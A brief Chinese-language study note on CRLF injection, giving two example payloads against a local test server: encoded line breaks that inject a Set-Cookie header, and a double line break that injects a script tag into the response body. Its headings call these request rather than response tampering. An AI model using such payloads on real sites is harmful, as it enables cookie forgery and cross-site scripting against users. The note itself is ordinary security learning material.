【漏洞】CRLF学习笔记
前言
CRLF学习笔记
漏洞原理
- 如果请求参数被写在了响应头中,则可以通过CRLF漏洞来篡改响应头或响应体
漏洞利用
篡改请求头
- 通过1组
%0d%0a实现1次换行,从而篡改请求头
1 | GET http://127.0.0.1:8080/?key=value%0d%0aSet-Cookie:key=value |
1 | HTTP/1.1 200 OK |
篡改请求体
- 通过2组
%0d%0a实现2次换行,从而篡改请求体
1 | GET http://127.0.0.1:8080/?key=value%0d%0a%0d%0a<script>alert(1)</script> |
1 | HTTP/1.1 200 OK |